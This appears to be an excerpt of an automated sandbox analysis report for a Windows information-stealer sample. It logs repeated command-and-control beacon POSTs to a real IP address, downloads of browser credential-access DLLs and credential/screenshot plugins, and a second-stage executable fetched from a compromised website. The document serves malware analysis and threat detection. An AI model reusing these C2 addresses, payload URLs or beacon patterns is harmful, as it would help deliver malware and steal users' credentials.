                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: Joe Sandbox View IP Address: 104.17.63.50
                              Source: Joe Sandbox View IP Address: 78.47.81.226
                              Source: Joe Sandbox View ASN Name: MIROHOSTWebhostingdatacenteranddomainnamesregistrati
                              Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: unknown TCP traffic detected without corresponding DNS query: 40.126.31.6
                              Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.222
                              Source: unknown TCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Code function: 0_2_004044CB __EH_prolog3_GS, InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, InternetCloseHandle, InternetCloseHandle, InternetCloseHandle
                              Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Host: 78.47.81.226 Connection: Keep-Alive
                              Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Host: 78.47.81.226 Connection: Keep-Alive
                              Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Host: 78.47.81.226 Connection: Keep-Alive
                              Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Host: 78.47.81.226 Connection: Keep-Alive
                              Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Host: 78.47.81.226 Connection: Keep-Alive
                              Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Host: 78.47.81.226 Connection: Keep-Alive
                              Source: global traffic HTTP traffic detected: GET /wp-content/themes/cinestar/extendvc/xsrv2.exe HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Host: ukedocumentary.com Connection: Keep-Alive
                              Source: global traffic HTTP traffic detected: GET /Hnq8vS/plugins/cred.dll HTTP/1.1 Host: 176.111.174.114
                              Source: global traffic HTTP traffic detected: GET /Hnq8vS/plugins/scr.dll HTTP/1.1 Host: 176.111.174.114
                              Source: unknown DNS traffic detected: queries for: api.faceit.com
                              Source: unknown HTTP traffic detected: POST /873 HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 78.47.81.226 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmp, blfte.exe, 0000000A.00000002.923945938.00000000006B5000.00000004.00000001.sdmp, blfte.exe, 0000000A.00000002.926601724.0000000003670000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.php
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.php)
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.php.FileTypeAssociationR
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.php14/Hnq8vS/index.php
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.php14/Hnq8vS/index.phpK
                              Source: blfte.exe, 0000000A.00000002.926933202.00000000036A9000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.php1D
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.php2
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.php9c61
                              Source: blfte.exe, 0000000A.00000002.926601724.0000000003670000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.php?t
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.phpC
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.phpo
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.phpr
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.phpv
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/plugins/cred.dll
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/plugins/cred.dllQ.b
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/plugins/scr.dll
                              Source: blfte.exe, 0000000A.00000002.926601724.0000000003670000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.11414/Hnq8vS/index.php
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/873
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/8734
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/E
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700301499.0000000000893000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/freebl3.dll
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700301499.0000000000893000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/mozglue.dll
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700301499.0000000000893000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/mozglue.dll:R
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700284995.0000000000879000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/msvcp140.dll
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700301499.0000000000893000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/nss3.dll
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700284995.0000000000879000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/softokn3.dll
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700284995.0000000000879000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/softokn3.dll4v=
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700301499.0000000000893000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/vcruntime140.dllTB
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700301499.0000000000893000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/vcruntime140.dlliB
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.geotrust.com/GeoTrustRSACA2018.crt0
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmpString found in binary or memory: http://cdp.geotrust.com/GeoTrustRSACA2018.crl0L
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0B
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://ocsp.thawte.com0
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmpString found in binary or memory: http://status.geotrust.com0=
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmp, wKYTg7Gp6P.exe, 00000000.00000002.700284995.0000000000879000.00000004.00000001.sdmpString found in binary or memory: http://ukedocumentary.com/wp-content/themes/cinestar/extendvc/xsrv2.exe
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700929303.0000000002C9D000.00000004.00000001.sdmpString found in binary or memory: http://ukedocumentary.com/wp-content/themes/cinestar/extendvc/xsrv2.exe;
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700929303.0000000002C9D000.00000004.00000001.sdmpString found in binary or memory: http://ukedocumentary.com/wp-content/themes/cinestar/extendvc/xsrv2.exe;slDB
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700929303.0000000002C9D000.00000004.00000001.sdmpString found in binary or memory: http://ukedocumentary.com/wp-content/themes/cinestar/extendvc/xsrv2.exeeDB
                              Source: mozglue[1].dll.0.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://www.mozilla.com0
